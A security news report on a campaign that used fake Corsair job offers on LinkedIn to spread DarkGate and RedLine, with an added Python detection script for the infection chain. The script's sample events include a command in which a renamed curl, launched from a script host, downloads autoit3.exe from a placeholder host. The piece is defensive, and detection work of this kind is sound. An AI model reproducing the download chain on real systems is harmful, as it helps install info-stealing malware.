Tuesday, October 24, 2023

Fake Corsair job offers on LinkedIn push DarkGate malware

A threat actor is using fake LinkedIn posts and direct messages about a Facebook Ads specialist position at hardware maker Corsair to lure people into downloading info-stealing malware such as DarkGate and RedLine.

Cybersecurity company WithSecure detected the activity and tracked the group, showing in a report today that it is linked to the Vietnamese cybercriminal groups responsible for the 'Ducktail' campaigns first observed last year.

These campaigns aim to steal valuable Facebook business accounts that can be used for malvertising or sold to other cybercriminals.

DarkGate was first observed in 2017, but its deployment remained limited until June 2023, when its author decided to sell access to the malware to a larger audience.

Recent examples of DarkGate's use include phishing attacks through Microsoft Teams that push the payload, and the abuse of compromised Skype accounts to send VBS scripts that trigger an infection chain leading to the malware.

Corsair lure

The Vietnamese threat actors targeted mainly users in the U.S., the U.K., and India who hold social media management positions and are likely to have access to Facebook business accounts. The lure is delivered over LinkedIn and involves a job offer at Corsair.

Targets are tricked into downloading malicious files from a URL ("g2[.]by/corsair-JD") that redirects to Google Drive or Dropbox to drop a ZIP file ("Salary and new products.8.4.zip") containing a PDF or DOCX document and a TXT file with the following names:

  • Job Description of Corsair.docx
  • Salary and new products.txt
  • PDF Salary and Products.pdf

WithSecure researchers analyzed the metadata of the above files and found links to RedLine stealer distribution.

The downloaded archive contains a VBS script, presumably embedded in the DOCX file, that copies and renames 'curl.exe' to a new location and uses it to download 'autoit3.exe' and a compiled AutoIt3 script.

The executable launches the script, which de-obfuscates itself and constructs DarkGate from strings present in the script.

Thirty seconds after installation, the malware attempts to uninstall security products from the compromised system, indicating an automated process.
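
The infection chain above (script host, renamed curl.exe, then autoit3.exe) leaves a recognisable process-creation pattern. The following is an added detection example, not code from WithSecure or the report; the event fields and sample events are constructed to resemble Sysmon process-creation telemetry and are not real indicators.

```python
"""Process-creation heuristics for the curl.exe -> autoit3.exe chain described above."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    image: str           # full path of the new process
    original_name: str   # OriginalFileName from the PE version resource
    parent_image: str    # full path of the parent process
    cmdline: str

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")  # assumed launchers of the VBS dropper

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_renamed_curl(ev: ProcEvent) -> bool:
    """curl.exe copied under another name: version info still says curl.exe."""
    return ev.original_name.lower() == "curl.exe" and basename(ev.image) != "curl.exe"

def is_script_host_download(ev: ProcEvent) -> bool:
    """A script host driving curl to write a file to disk (-o / --output)."""
    return (basename(ev.parent_image) in SCRIPT_HOSTS
            and ev.original_name.lower() == "curl.exe"
            and re.search(r"\s(-o|--output)\s", ev.cmdline) is not None)

def is_autoit_from_script_host(ev: ProcEvent) -> bool:
    """AutoIt interpreter started directly by a script host."""
    return basename(ev.image) == "autoit3.exe" and basename(ev.parent_image) in SCRIPT_HOSTS

RULES = {
    "renamed_curl": is_renamed_curl,
    "script_host_download": is_script_host_download,
    "autoit_from_script_host": is_autoit_from_script_host,
}

def evaluate(events):
    """Return (rule_name, image) for every rule that fires on every event."""
    return [(name, ev.image) for ev in events for name, rule in RULES.items() if rule(ev)]

# Constructed sample events (hypothetical paths and host; not real telemetry).
SAMPLE = [
    ProcEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
              r"C:\Windows\System32\cmd.exe", "curl.exe https://example.invalid/"),
    ProcEvent(r"C:\Users\u\AppData\Local\Temp\cr.exe", "curl.exe",
              r"C:\Windows\System32\wscript.exe", "cr.exe -o autoit3.exe http://placeholder.invalid/a"),
    ProcEvent(r"C:\Users\u\AppData\Local\Temp\autoit3.exe", "AutoIt3.exe",
              r"C:\Windows\System32\wscript.exe", "autoit3.exe script.a3x"),
]

if __name__ == "__main__":
    for name, image in evaluate(SAMPLE):
        print(f"{name}: {image}")
```

The first sample event (stock curl.exe run from cmd.exe) fires no rule, while the renamed copy under Temp and the script-host-spawned autoit3.exe each do.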

LinkedIn introduced features to fight abuse on the platform late last year that can help users determine whether an account is suspicious or fake. However, it falls on users to check the verified information before engaging in communication with a new account.

WithSecure has released a list of indicators of compromise (IoCs) that could help organizations defend against activity from this threat actor. The details include IP addresses, domains used, URLs, file metadata, and names of archives.
